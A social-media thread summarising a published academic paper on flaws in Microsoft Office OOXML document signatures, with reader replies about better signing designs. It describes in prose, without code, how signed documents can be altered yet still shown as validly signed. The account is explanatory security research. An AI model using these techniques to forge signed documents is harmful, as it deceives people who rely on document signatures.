I don't so much care about OOXML signatures per se (maybe there's some European government that relies on them, but I've never seen a signed .DOCX in real life), but this paper is super useful just as a record of how to test a signature system.

https://www.usenix.org/conference/usenixsecurity23/presentation/rohlmann

Every Signature is Broken: On the Insecurity of Microsoft Office’s OOXML Signatures | USENIX

You're a vulnerability researcher and somebody drops OOXML signatures on your lap, asks "do these things work?”

Well, what does "work" mean? Here, it means "everything the renderer displays to a doc viewer today was knowingly signed by the authority who signed it yesterday”. That's a hard problem! Much harder than signing an .deb package.

So the first thing the researcher does is go figure out how OOXML works in the first place. Surprise, it's a nightmare! 40 years of stratified features dating back to Multi-Tool Word for Xenix. The first 3 weeks of your project are probably just reading the spec.

You come to learn that an OOXML .DOCX is a ZIP archive with what appear to be three different manifests inside, because why not. They are:

1. [Content_Types.xml], mapping filenames to content types; any file in the bundle not in this manifest will trigger an error.

2. document.xml.rels, mapping filenames to symbolic IDs, which are referenced from documents themselves.

3. The "Package Info" section of "sig1.xml”, the signature block, which maps files to hashes of those files.

The "index.html" of a .DOCX file is a file in the bundle called "document.xml", and that's where all rendering starts.

You can sort of spitball how you'd do a signing scheme for this system; maybe it doesn't have to be complicated at all. Just reject signatures for any .DOCX bundle that includes a file not in the "Package Info" section.

But there's this paper, so you know that's not what they did.

So, [Content_Types.xml] isn't signed at all. You can add and remove files to a .DOCX bundle without breaking the signature.

But that doesn't necessarily matter, right? Those are just files in a ZIP file What matters is whether files get pulled in by the rendering process. You imagine the designers of this format starting with an axiom like “if it's referenced by document.xml, it has to be signed”. More on that in a sec.

The bigger problem is how “document.xml.rels” is signed. Remember, this is the mapping of symbolic IDs to filenames in the bundle; it's what the renderer consults when following links between files in the bundle; it's the routing table of a .DOCX.

Instead of signing "document.xml.rels", the signer parses it, and adds the hash of each referenced file to the "Package Info" manifest. The ".rels" file itself: not signed.

This is a mystifying decision.

So you're the researcher and you're researching this blob of goo. Where do you start?. Well, one good place would be: are there files _besides_ "document.xml" that get automatically rendered by Word?

Turns out: yes. If it exists, "people.xml”, which is information about the authors of the file, will get rendered. The rendering instructions in that file, like anything else in a .DOCX, can effectively take over the whole document window.

So, a trivial attack: take any signed .DOCX without a "people.xml”, and add a "people.xml" that rewrites the document. Game over.

Next, you might look for rendering semantics that aren't directly expressed in the .DOCX bundle, but are carried implicitly in Word's code. References between files are explicit --- they're encoded in the .rels file. But what about things like fonts and styles?

Styles in a .DOCX are recorded in "styles.xml”. So: a slightly more complicated attack: get a benign .DOCX signed without a "styles.xml”, then add a "styles.xml" that drastically changes what gets shown to a viewer or printer.

A similar attack exists for fonts, which seems like it was fun to come up with but must be much less useful than the styles thing.

Your goal as an attacker is to get malicious content onto the screen or a printed page. There's blood in the water now: it seems apparent that the signature scheme designers were given documentation on how .DOCX files work, and little else. So what else does the 50 million lines of code in Word do that might surprise the .DOCX verifier?

Document repair!

Take a validly-signed .XLSX (I'm sure one exists somewhere). Now, add the files from your malicious .DOCX into the bundle. Rename the file to a ".DOCX". Open it in Word.

Word will offer to "repair" it (because XLSX files sprouting DOCX files and vice versa is apparently common enough for there to be a feature for this) and then render the malicious .DOCX as if it were signed.

There's a similar attack that I barely have my head around involving support for legacy .DOC files. You can get a .DOC signed, then scrape its signature out and splice it into a .DOCX file; add the .DOC components to the .DOCX bundle as files. The renderer will validate the .DOC signature, but display the .DOCX contents.

To me all of these attacks are variations on the same basic theme:

1. Find whatever flexibilities the signature format gives you; all the ways in which the signed object is malleable.

2. Look for implicit rules for interpreting/executing/rendering the signed object; behaviors that aren't directly recorded in signed metadata.

More attacks. Let's start simple. Does the signature verification code work?

Not on macOS. On macOS, apparently, the mere presence of a "sig1.xml" signature file is enough to get the renderer to say the file is signed properly, even if it's empty.

OK, but that's macOS. Nobody takes macOS seriously. Did they at least, like, unit test this thing?

These are XML signatures --- never sign XML --- and so each semantic object that's signed is an independent "reference”, even within the same file. So, let's try something simple: can we provide a signature that doesn't reference _anything_?

Indeed we can! Semantically, a "sig1.xml" signature includes a reference to the "Package Info" manifest, from which we get all the hashes parsed from "documents.xml.rel”. That's the heart of the document signature.

But because XML, we can create a signature block that doesn't include a reference to the "Package Info" manifest. It "verifies" --- there's nothing really to verify but itself --- and Word renders the resulting content as if everything was signed. You can use a random SAML token instead of a .DOCX signature, and it works.

I can't say loudly enough how much all of these attacks are enabled by XML. There is nothing in the universe worse to sign than an XML document, except, maybe, a .ZIP file bundle of XML documents linked together by another XML document.
BY THE WAY if any of you know any of these Ruhr weirdos, tell them we'd love to bug them with questions on the SCW podcast.
or are they Bochum weirdos? This is the level of discourse they'd have to put up with if they talk to us. But they should do it for the good of the discourse.
@tqbf unless they're actually ruhr water dwellers, i'd opt for bochum.
@tqbf the uni is officially abbreviated RUB, if that helps? :) you should reach out to Christian directly https://informatik.rub.de/nds/people/mainka/
Dr.-Ing. Christian Mainka – Fakultät für Informatik – Ruhr-Universität Bochum

@tqbf forwarded to an undefined group of people from Bochum 👻
@tqbf Sent this toot to one of the authors, looking forward to an episode with them!
@tqbf so what I'm hearing is you have a new proposal for the DNSSEC protocol?

@tqbf as a complete novice to this space, what would be a better way to do this kind of thing, assuming you can only distribute a single file?

Zip everything together, sign the bundle, and wrap the sig + bundle in another zip?

@zrail Bunch of different ways to do that; if you can't change the bundle archive format, you could still include a hash of the enclosing bundle in the manifest.

I might look for some kind of DOM-style object to sign instead of the the raw XML.

The authors suggest that they just fully sign documents.xml.rel, which is still a lot of flexibility to give an attacker.

@zrail @tqbf Hash every file in the ZIP, sign the hashes and put the result in ZIP comment?

@zrail @tqbf In my opinion, that's pretty much the "right" approach. As Thomas said, much of this nonsense is enabled by XML, and the only way to get rid of XML is to ignore it by treating the document a s a binary blob. (I remember reading papers by Peter Gutmann, who said much the same thing at least 20 years ago.)

As an example to show how signature-unfriendly XML is, consider that whitespace may not matter in certain situations. E.g., <a><b></b></a> may be the "same" document as <a> <b> </b> </a> (with spaces). So before you can start signing your document (or start verifying a signature), you have to transform it into a "canonical" form. According to Peter Gutmann (IIRC), one book on XML signatures spends half of its pages on describing canonicalisation.

And that's not even considering encodings, namespaces, external entities, or all the other things that make XML so hard to get completely right.

@tqbf Thank you very much for this overview of the findings and especially the summary of practical learnings, Thomas!

@tqbf I am now thinking of what signing a LaTeX file would be like. LaTeX is notoriously bad at managing the versions style and class files to be used.

I have decided that I don’t want to think about it anymore. Thirty seconds of thought has frightened me away.

@tqbf as someone who actually needs to digitally sign documents on a regular basis, im left wondering if it’s better or worse that the usual solution is to convert to PDF, then use Acrobat to create a visible signature.
@tqbf sounds like the security of this things hinges on document forgery being a crime, rather than cryptography.
@tqbf if you’re having word problems, I feel bad for you son. I got 99 problems…